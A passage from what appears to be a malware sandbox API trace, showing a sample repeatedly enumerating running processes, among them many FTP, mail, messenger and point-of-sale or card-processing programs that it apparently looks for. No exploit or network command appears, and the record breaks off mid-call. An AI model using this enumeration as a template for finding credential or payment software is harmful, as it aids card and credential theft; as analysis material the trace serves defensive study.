th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0290.989] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0290.991] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0290.992] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0290.994] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0290.995] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0290.997] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0290.999] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0291.000] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0291.002] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0291.003] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0291.005] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0291.006] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0291.008] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0291.010] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0291.011] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0291.060] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0291.062] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0291.064] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0291.066] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0291.068] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0291.071] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0291.073] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0291.074] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0291.076] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0291.078] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0291.079] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0291.081] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0291.083] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0291.085] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0291.087] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0291.089] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0291.091] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0291.093] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0291.095] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0291.096] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0291.098] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0291.100] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0291.101] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0291.103] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0291.105] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0291.136] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0291.145] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0291.147] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0291.149] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0291.150] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0291.152] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0291.154] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0291.156] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0291.157] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0291.159] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0291.160] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0291.162] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0291.164] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0291.165] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0291.167] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0291.169] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0291.170] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0291.172] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0291.174] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0291.175] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0291.177] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0291.179] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0291.180] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0291.182] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0291.200] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.202] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0291.204] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0291.205] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0291.207] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0291.208] CloseHandle (hObject=0x2134) returned 1 [0291.208] Sleep (dwMilliseconds=0x64) [0291.362] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0291.372] Process32First (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.373] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0291.374] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0291.376] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.377] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0291.379] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.380] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.381] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.383] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.384] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.386] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.387] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.389] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.390] Process32Next (in: 